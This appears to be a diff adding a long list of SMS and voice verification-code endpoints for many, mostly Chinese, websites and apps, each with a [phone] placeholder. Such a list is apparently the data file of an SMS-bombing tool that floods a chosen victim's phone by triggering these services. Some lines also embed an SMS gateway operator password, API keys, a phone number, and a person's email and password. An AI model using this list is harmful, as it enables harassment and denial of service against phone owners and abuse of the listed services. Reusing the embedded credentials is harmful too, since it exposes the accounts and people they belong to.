+ "http://ketang.ldcstudy.com/nsuser/h5/getCode.vm?phone=[phone]&servicekey=", + "http://sqb.xiaoshijie.com/api/1/user/getCaptcha/?_did=00000000-7998-6e7e-026a-0aa25c86693a&_app=sqbao&_atype=android&_network=2&_networkType=0&_t=1556866758&_swidth=1080&_sheight=1920&_imei=861913032338784&_manufacture=ZTE&_model=ZTE+BV0730&_osver=6.0&_tn=0&_st=0&i", + "http://smsspub.mail.163.com/mobileserv/fsms.do?product=AndroidMail&template=ds&callback=sendCallback0&_=1430485975547&mobile=[phone]", + "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=18", + "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=11", + "http://www.kl.cc/User/RegSendMobilMail?t=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]&app_code=ECS-2233&msg_type=01", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=+86-[phone]", + "http://m.51awifi.com/msv2/sms/send?callback=jQuery111307387434379197657_1489515690497&mobile=[phone]", + "http://m.tk.cn/tkmobile/service/member?function_code=dynamicLogin&login_mobile=[phone]", + "http://gw.dianzuanmao.com/user/getCsbCode?phone=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?platform=console&token=&phone=%2B86[phone]&code=10164337", + "https://account.perfma.com/api/login/authentication/v1/picCaptcha?2&phoneCaptcha=[phone]", + "https://sso.agora.io/api/verify/sms?phone=%2B86+131+5822+6398&lang=cn&country=CN&captcha=[phone]", + "http://splus.bianfeng.com/index.php?r=findAccount/SendCode&rnd=&a=[phone]", + "http://app.doowinedu.com/Api/register.php &accountLogin.loginName= accountLogin.mobile=[phone]", + "http://api.qingmang.me/v1/account.sendVerification?code=1566478386.8872059778&phone=%2B86[phone]", + "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=4eee9083e9d146799ef5828ac583d8b3&user_domain=hj", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data=%7B%22phone%22%3A%22[phone]", + "http://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://apis.changbalive.com/apis.php?ac=registerwithphone&curuserid=&channelsrc=appstore&version=3.0.2&token=&bless=0&macaddress=5C351103-F887-4932-BC59-58C75875EFDE&ismember=0&openudid=e77c9aae3b3d1994fdb56947e974fc21fcf20f99&systemversion=12.4&device=iPhone8,1&b", + "http://106.12.43.240/api.php?act=user&key=m898F3fn4rf53j643T42&phone=[phone]", + "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]", + "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", + "http://www.maizjr.com/register/identifyingcode.json?mobile=[phone]", + "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]&_=1506486656411", + "https://wapi.jfh6688.cn/sendRegisterCode?type=1&login=[phone]", + "http://h5user.rastargame.com/vcode/Mobile/page/?callback=jQuery111306684320296387496_1551691777816&mobile=[phone]&type=reg&client=wap&_=1551691778330", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]&_=1523359575414", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=4", + "http://jnggzy.jinan.gov.cn/jnggzyztb/regist_gys/putPhone.do?aa=Math.random()&phone=[phone]", + "http://passport.ctrl.cn/sms/reg?mobile=[phone]", + "https://api.bat100.net/v1/authority/sms/send-sms?tel=[phone]&smsType=2", + "https://api.bat100.net/v1/authority/sms/send-sms?tel=[phone]", + "http://store.ncpa-classic.com/api/comm/smsNew?callback=jQuery17202866925711954793_1605436223502&mobile=[phone]", + "http://v.juhe.cn/sms/send?mobile=[phone]&tpl_id=11115&tpl_value=", + "http://api.v2.msparis.com/common/mobile?channel=App%20Store-vest&clientId=msparis-ios-4.2.4-vest&mobile=[phone]&platform=ios-vest&rent_mode=2", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]", + "http://www.cshixi.com/api/sendCode?username=[phone]", + "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]&tag=yhoQ9arXKRk3AqpwPGwklOAb/ghFcjxlx0uZNXuiOhXg6sItA%2BuIMWLFLQzyVfRCP1db%2B11CZSVvwzQvNR8xKgpkH2h9VTHRHAPTgHMWw6q5e1SYTdcMB4er6KEEPEDzFU2yJ3N", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8,1&form.phoneNumber=[phone]&form.phoneType=1&fo", + "http://5.9188.com/user/sendSms.go?mobileNo=[phone]", + "http://app.zhigoukeji.com/index.php?s=%2Fapi%2Fmobile_verify_code_get_request%2Findex2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://m.robotest.cn/user/sms.html?tel=[phone]", + "http://cms.51fenmi.com/api/base/public/getCode?mobile=[phone]", + "http://exmail.qq.com:80/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "http://www.upshop.cn/Home/User/registerSendCode.html?mobile=[phone]", + "http://www.hzrc.com/ww/b/a/wwba_sendMobileCode.html?phone=[phone]", + "http://www.chaojitao.cn/index.php?act=login&op=send_reg_sms&f=reg&mobile=[phone]", + "http://www.jc258.cn/signup/send_sms?mobile=[phone]", + "http://api.wangxiao.cn:80/app/user.ashx?mobile=[phone]&t=mobilelogincode", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=22", + "http://my.baihe.com/Getinterregist/getPhoneVerifyCode?jsonCallBack=jQuery18306001467584540825_1439706800918&type=2&phone=[phone]&_=1439707017074", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&accessType=1&circleId=100000055", + "https://www.xiongmaojinfu.com//user/index/sendSms?mobile=[phone]", + "http://m.sjingbang.com/api/app/sendSmsCode%2522,%2522rediskey%2522:%2522AppRegValidate%2522,%2522gjdqCode%2522:%252286%2522%257D&_1600248070800=[phone]", + "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", + "https://passport.deepoon.com/api/user/getVerifyCode?accesstoken=5381cfb341266380dd9cd812d068d031&amp;timestamp=1548161770&client=3dboboAndroid&version=6.6.4.tencent&type=1&mobile=[phone]", + "http://reg.suning.com/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "https://www.zx123.cn/member/register.php?action=getcode&ajax=1&mobile=[phone]", + "https://user.hundun.cn/get_identify_code?clientType=pcweb&versionName=&imei=&net=&phone=[phone]&source=verify", + "http://www.wfggw.com/getcode.asp?num=[phone]&_=1480403250456", + "http://account.bababus.com/wap/sendDynamicVerifyCode.htm?mobilePhone=[phone]", + "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone6s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", + "https://h5.gumipet.com/shops_sms_register?phone=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]&app_code=ECS-2233&msg_type=01", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]&sign=jBvhDrZ6SlcNzwkCx6SIhwkLtCZZ1GCCjvPj%2524%2524QD8balMbMtSRigOLwJkGjU%2540%2540PIsjj1rTgAEWBZDHlnw3%2540%2540Yrg9qGdwvb5Qv4euoCCHNExqXAGhb", + "http://xst.520xst.com/xst/getCode?callback=jQuery111009421744498287961_1580993309090&sex=0&channel=hyapp1001&mobile=[phone]&src=napp_ios_2138&interfaceCode=1&type=quickLogin&osType=1&bp=5bm/5Lic&s=eyJrIjoiM2RhNTM3MjFlOWFlYmFmNTQxZmQ2MjI5NTU0NDgzMDUiLCJTIjoiamluZ3l1", + "http://jiuji.lyqchain.cn/Api/System/SendMsgCode?format=json?Tel=[phone]", + "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", + "http://app.zhigoukeji.com/index.php?s=/api/mobile_verify_code_get_request/index2&mobile=[phone]&type=register&sign=e6d1fbbdcd5975b310190544e9f45015", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]&sign=8D0A118A972CD8A303403728659FC0F4FA194447", + "https://news-api.prest3.com/api/users/sendMessageForRegLogin?phone=[phone]", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]&sign=74F59C2BB6F3830D6EB835FDA7550EB7&t=1564024638", + "https://api.daishangqian.com/v2/user/send-sms-code?phone=[phone]", + "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]", + "http://lvyou.baidu.com/business/api/orderforward?callback=jQuery182032357188081368804_1490544543748&source=lvyou&phone=[phone]&qt=phone_captcha&sub_from=order_list&request_from=webapp&_=1490544543509", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]", + "http://user.tgbus.com/api/action.ashx?callback=callback10491710835861462&t=sendsms&format=json&Action=0&phone=[phone]", + "http://user.daojia.com/user/getSmscode?mobile=[phone]&bu=", + "http://zgtv.spo38.igeek.gq/aip/index3.php?hm=[phone]", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1544753247279&req_time=1544753262715&user_id=&app_code=ECS-YH-WAP", + "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18301483604325027934_1570445210207&mobile=[phone]", + "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]&unique=1&areaCode=86", + "http://sms.maogoo.cn/index.php?hm=[phone]", + "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]", + "http://wap.10010.com/mobileService/tuiguang/sendMsg.htm?mobileNumber=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=19", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&accessType=1&circleId=100000055", + "http://jieapi.profacty.cn/api/verification/sendPhone?phone=[phone]&type=102&timestamp=1559301154413&sign=e720200313338403aaa8e13a3f333da7", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?_ts=1564136775711&country=+86&mobile=[phone]", + "http://api.mianmianyue.com/basis/sendCheckCode?mobile=[phone]&checkSign=Gec1LPgwdA4OOyqQLAS5UkZnmck2eRyJxJP6rvTU7K8%3D", + "https://passport.fanhuan.com/login/asklogincode?callback=jQuery183041957833420943325_1584502778631&mobile=[phone]&_=1584502793693", + "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=2", + "http://wskh.newone.com.cn/newlogincontroller/getrandompassword?mobile=[phone]", + "https://www.dfcd168.com/checkAndSendSms.html?mobile=[phone]", + "http://19.offcn.com/send_message/seccode/?0.8413693207408235&msgpic=user=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=17", + "https://appv2.lygou.cc/loyouser/getBindCode?appfrom=203&appver=3.2.2&identity=%2B86[phone]", + "http://api.yinka.co/common/sms?cellphone=[phone]", + "http://ld.liandan100.com/ldmgr/api/user/sendVerifySms?platform=1&versionNum=53&&r=&partnerId=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]&city=\u91cd\u5e86\u5e02&lat=29.593100&lng=106.291519&version=6.1&os=ios&auth=1&sign=1ae1dda00913d0707905455258cd5045", + "http://daogou.zdl123.com/daogou/webService?mobile=[phone]", + "http://api.hanju.koudaibaobao.com/api/user/verifyMobile?country=%2B86&mobile=[phone]", + "http://api.gaotu100.com/user/v2/send_passcode?captcha_mode=NETEASE&type=3&mobile=[phone]&code_type=0", + "http://buckle.lvronghui.com/promotion/transfer.php?phone=[phone]", + "http://reg.suning.com/ajax/code/sms.do?scen=WAP_WCHAT_PUB_ACCT_UNION_LOGIN_MOBILE_REG&phoneNum=[phone]", + "http://yinyu.leanapp.cn/tools/getNum?&phone=[phone]&sign=4ee234df92d36632c5a7082399b9890a&timestamp=1567136457", + "http://www.chaojidaogou.com/MsgHandler.ashx?t=sendcode&phone=[phone]", + "http://i.vaakwe.com/user/reg_send_code.php?mobile=[phone]&country=0086&udid=a884f6c7f15ff08a97ab16e4d33fe2c216a9ebed&imei=02:00:00:00:00:00&mac=02:00:00:00:00:00&imsi=02:00:00:00:00:00&token=ba4edbf30bc5363ba02875fc4c6b25c8a21ed8a99e21c5c40ff6385c43c71c8b&type=sms&", + "http://www.line0.com/usercenter/voiceVerificationCodeUserLogin.do?mobile=[phone]&voiceType=login", + "http://www.rrjc.com/sendVoiceCodeByType.do?username=[phone]&regType=1&v_module=toNoviceRegistered", + "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", + "https://sso.360che.com/?c=code&_0.6284588856010609&tel=code=[phone]", + "http://5.9188.com/activity/activityMobileCheck.go?id=qzkj&mobileno=[phone]", + "http://api.66yxq.com:8075/gateway-web/send.htm?mobile=[phone]", + "http://jyw.vhujao.cn/m/reg/motregchk.php?mob=[phone]", + "http://ct.ctrip.com/me/register/Verify?name=%E5%90%B4%E5%A5%87&email=357058116%40qq.com&mobile=[phone]&passwd=xiyu8187", + "http://www.flyertea.com/plugin.php?id=dzapp_mobile&mod=ajax&ac=code&type=reg&inajax=1&formhash=e55ad49c&mobile=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=8", + "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8%2C1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=%2B86-[phone]&net=wifi&", + "http://api-v1.ezpaychain.com/invoice/v1/user/send-sms?calling_codes=+86&phone_number=[phone]&type=activation&version=1", + "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", + "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", + "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]", + "http://user.memeyule.com/authcode/send_mobile?mobile=[phone]", + "http://api.passport.pptv.com/checkImageCodeAndSendMsg?&scene=REG_PPTV_APP&deviceId=867830021000533&aliasName=[phone]", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18307610929541763114_1547125502231&nation=CN&type=5&from_domain=i&verifycode=&_=1547125703761&phone=[phone]", + "http://cthwallet.com/en/data/dy/index.php?hm=[phone]", + "http://www.52tanbao.com/tanbao-app-api/SendValidCode?telephone=[phone]", + "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=5", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", + "http://www.ttpai.cn/signup/success?mobile=[phone]", + "https://www.xintongdai.com/customer/login/register/acquirePhoneAgreeItem?phone=[phone]", + "https://reg.suning.com/srs-web/ajax/code/sms.do?scen=PERSON_MOBILE_REG_VERIFY_MOBILE&uid&code&dfpToken=THrLck1681e2c9a89rGPm639e&detect=mmds_uDjz1jfWoxDDcojxxwoDwgWozujMf1xjggnjkZJwujuDMonJNNojJfZogzMxoxMnW1NDJZjwukndT5UBJ5qL55XxZeNvx5fxAC4055SwwTkl555-xjC-555KxOC.", + "http://api.passport.pptv.com/snsms/sendcode?cb=msSendCode&phoneNumber=[phone]&deviceId=p_1584518586025_48072460278550296&terminal=PC&channel=208000103005&uuid=0e2a64ae-e07e-49d6-852e-3de883df8003&imgCode=&format=jsonp&_=1584518959802", + "https://shared.ivydad.com/api/mobile/member/sendSmsCode?callback=jQuery111009421744498287961_1580993309090&appid=wx0e2dec5e762806fd&version=2.8.1&app_name=ivydad&channel=App%20Store&sys_version=12.4.1&type=register&sys_type=ios&token=&member_uuid=0&device_name=iPho", + "http://passport.58.com/mobileauthcodelogin/getcode?valIDAtecode=?=true&source=m-my&callback=jsonp_callback2&mobile=[phone]", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]", + "https://www.zx123.cn/member/register.php?action=getcode&ajax=1&mobile=[phone]", + "https://www.baixing.com/oz/verify/reg?mobile=[phone]&businessType=register_captcha_code", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]", + "http://slb-sport.vesal.cn:80/vesal-sport-prod/v1/app/member/getCode?tellAndEmail=[phone]", + "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]&gCode=", + "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]&nation=CN&type=0&format=json&guid=56fa5d7a032a8190dd9844ebaa211181&partner=237b12de4c48eacec5a368eb192c3c5e&productname=51job&uuid=e7ab248c2ba73cb851a1eb31aa138695&version=869", + "http://passport.centanet.com/m/page/ajax/20C79442F06E.ashx?Act=SetCode&phone=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=20", + "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=21", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=0", + "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]", + "https://www.d7w.net/index.php?g=Member&m=Api&a=getmobilecode_binding&j=json&mobile=[phone]", + "http://gk.huixinyt.com/app1dxxy/index.php/Index/getcode1?1=1&mobile=[phone]&_=1551173567907", + "https://n.daoxila.com/verification/appSend?mobile=[phone]", + "http://n.youyuan.com/v20/yuan/get_registerMobile_code.html?mobile=[phone]", + "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]", + "https://ddxq.mobi/api/v1/user/mobile/check/?api_version=8.30.2&app_client_id=1&channel=App%20Store&countryCode=CN&device_id=a3bd2adebf3a389bb044fea62d52c8c55a1577ce&device_model=iPhone8%2C1&device_name=iPhone%206s&languageCode=zh&latitude=29.587192&localeIdentifier", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=1", + "http://m.shanzhen.me/sz/index/smsverifyp?phone=[phone]", + "http://api.yoyo360.cn/rest/authcode/send.json?18286967362=[phone]", + "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]", + "http://www.wandafilm.com/login.do?m=sendSms?mobile=[phone]", + "http://api.pintx.cn/User/SendCommonSms?user_tel=[phone]", + "http://klfsh.mangguohd.com/mghdSys/android/sign/sendMobileVerifyCode/[phone]", + "https://nuc.api.mgtv.com/GetMobileCode?_support=10100001&device=Redmi&osVersion=6.0.1&appVersion=6.2.0&ticket=&userId=0&mac=i8812baafc8de4fe&osType=android&channel=qq&uuid=&endType=mgtvapp&androidid=8812baafc8de4fe4&imei=&macaddress=&seqId=&version=5.2&type=10&abro", + "http://quan.lukou.com/api/sms/verification_code?phone=[phone]", + "http://hbrbapi.hubeidaily.net/amc/client/getAuthCode?mobilephone=[phone]&nodeCode=ecdc5307-888e-4322-8817-f04bd81a7e82", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=14", + "http://i.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", + "http://hy.hryouxi.com/HRPF/website/sendSMS.do?phone=[phone]", + "http://common.apis.tod.top/v1.1.0/sendsms.php?mobile=[phone]", + "http://loan.ef008.cn/sms/sendSms?smsType=1&phone=[phone]", + "http://m.yunqiandai.com/mobileCode/sendMobileCodeV/reg?phone=[phone]", + "http://gw.dianzuanmao.com/user/getCsbCode?phone=[phone]&type=1", + "http://test2.p10155.cn:8075/sendCode.ashx?phonenum=[phone]", + "https://www.moretickets.com/openapi/pub/photo_codes/v1/photo_code?bizCode=MTL&verifyCodeUseType=USER_LOGIN&cellphone=[phone]", + "http://m.aihuaju.com/wap/index.php?act=security&op=send_reg_mobile&mobile=[phone]", + "http://photograph.yuanlikj.cn/send/Send?appName=\u622a\u56fe\u79c0-\u5bf9\u8bdd\u751f\u6210\u5668&TELMobile=[phone]", + "http://www.qmango.com/users/ajax/ajax_register_code.asp?_=1487743660579&mobile=[phone]", + "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", + "http://gangqinpu.yusi.tv/?urlparam=cginfo/userinfo/sendsms&phonenum=[phone]&platform=iphone&sendtype=1&version=1.5.6", + "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8,1&form.phoneNumber=[phone]", + "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", + "http://hk-dns.sskweb.cn/api.php?act=user&key=XsWxsZDyh58V9whXWR&phone=[phone]", + "https://a1.go2yd.com/Website/user/login-mobile?platform=1&androidId=3d733e2a62588cd977f14876331368d1&deviceId=5284047f4ffb4e04824a2fd1d1f0cd62&cv=4.8.8.1&secret=7a0a51884d933ea12bc8531edb05147468a8f136&reqid=czak52qh_1547987726471_360&brand=Xiaomi&mobile=8618529142", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]&mobilestep=1&verification_code=&verify_flag=&verify_global=ma624mg0j80trr7ldvwcl15c1f&c_aver=1.0&c_src=2&c_v=5.3.1.24&devid=63599267906091", + "http://www.pureyeah.com/public/api/auth/getVerificationCode?mobile=[phone]&dispatch=", + "http://www.gkbbapp.com/Support/JsonNews.aspx?sendShortMessage=yes&Telephone=[phone]", + "http://dgapi.zczgcn.com/shopSupport?Mobile=[phone]", + "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", + "https://passport.ziroom.com/verify/code/v2?phone=[phone]", + "http://prod.layadmin.cn/api/message/sendV2?app_id=1&version=1.4.0&channel_id=001&phone=[phone]", + "http://www.yaya.cn/tools/web_submit.ashx?action=reg_get_mobile_code&mobile=[phone]", + "http://47.88.105.195:8080/admin-web/buyers/getVercode.htm?mobile=[phone]", + "http://member.med66.com/uc/smscode?phone=[phone]", + "http://www.hcoriental.com/api/v1/user/auth_code/?phone=[phone]", + "http://doc.u-ease.com/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://www.csti.cn/uums-user-front/api/user/register/phone/send?phone=[phone]", + "http://221.179.180.158:9008/HttpQuickProcess/submitMessageAll?OperID=zjawu&OperPass=AqBTaIWp&DesMobile=[phone]", + "http://www.zjsgat.gov.cn:8080/was/UserInfoServletAjax?formaction=message2&mobilephone=[phone]", + "http://bizapi.pezy.cn/qknode/sms/reqSmsCode?publishid=1003&deviceId=2808ec7ef7fbeed6&df=android&vt=5&screen=1080x1920&deviceid=2808ec7ef7fbeed6&proid=qknode&os=android&av=NMF26X&appVersion=1.4.0&imei=&ov=7.1.1&osVersion=7.1.1&osLevel=25&phone=[phone]&token=", + "http://howe.xiumaikeji.com/api/v1/howeFront/user/userIsRegist?phone=[phone]", + "http://wo10010sh.cn/ticket/?a=[phone]", + "https://register.7moor.com/Action?callback=jQuery17208585139394580638_1584431746146&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", + "http://passport.chinahr.com/ajax/m/sendCode/[phone]?tmpid=1957&from=2&imgCode=", + "http://www.youmw.top/tool/dxhz/?hm=[phone]", + "http://www.booms.ga/mini/index.php?hm=[phone]", + "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]&op=10&k=d12c14cc39c8a48be8c181e401e4b962", + "http://m.yaya.cn/tools/web_submit.ashx?action=reg_get_mobile_code&mobile=[phone]", + "http://doc.u-ease.com:80/account/Verifycode/login?app_os=IOS&app_version=3.0.8&device_id=B097BD84-2B27-4E2B-AAB3-D05E3AE0FBE0&phone=[phone]", + "http://id.ifeng.com/api/simplesendmsg?mobile=[phone]&comefrom=7&auth=&msgtype=0", + "http://n.youyuan.com/v20/yuan/get_registerMobile_code.html?mobile=[phone]&from=5599", + "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", + "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]", + "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO%2B6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC%2B%2FCA&phone=[phone]", + "http://xinweixin.11183.com.cn/youzheng/login/security?phone=[phone]", + "http://www.fcbox.com/noshiro/retrievePhoneMessagePreventAttacks?mobilePhone=[phone]&smsType=5", + "https://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", + "http://user.zhangyoubao.com/passwords/getVerifyCode?mobile=[phone]", + "https://dappweb.huolala.cn/index.php?_su=1609554659540820860&revision=&_m=register&_a=send_register_sms_code&phone_no=[phone]", + "http://my.cnki.net/elibregister/Server.aspx?mobile=[phone]&temp=1551691791466&operatetype=2", + "http://hall.m.qxiu.com/mobileuser/user/getphonecode?phone=[phone]", + "http://www.lxzbsjsm.com/auth/smscode.ashx?action=vd&aid=5813&mb=[phone]", + "http://vip.timesawards.com/Method/getAuthCode?target=[phone]", + "http://iclass.ruijie.com.cn/icmgr/rest/techReg/sms?timeStamp=1605428709505&phoneNo=[phone]", + "http://activity.renren.com:80/livecell/ajax/tryVerify?sanbox=a&phoneNum=[phone]", + "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", + "http://appsever.caissa.com.cn/api/token/user/verifyAndgetCaptcha?data={'phone':'[phone]", + "http://m.10010.com/mall-mobile/CheckMessage/captcha?phoneVal=[phone]&type=16", + "http://api.duo17.com/sendsms.do?os_type=android&app_version=2.4.0.0&device_id=860903034476097&pnum=[phone]", + "http://api9000.chengqinhr.xyz/app/getQmjzSms/[phone]?appid=com.qgjz.ptjz", + "http://www.xjwvxz.com/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", + "http://cms.51fenmi.com:80/api/base/public/getCode?mobile=[phone]", + 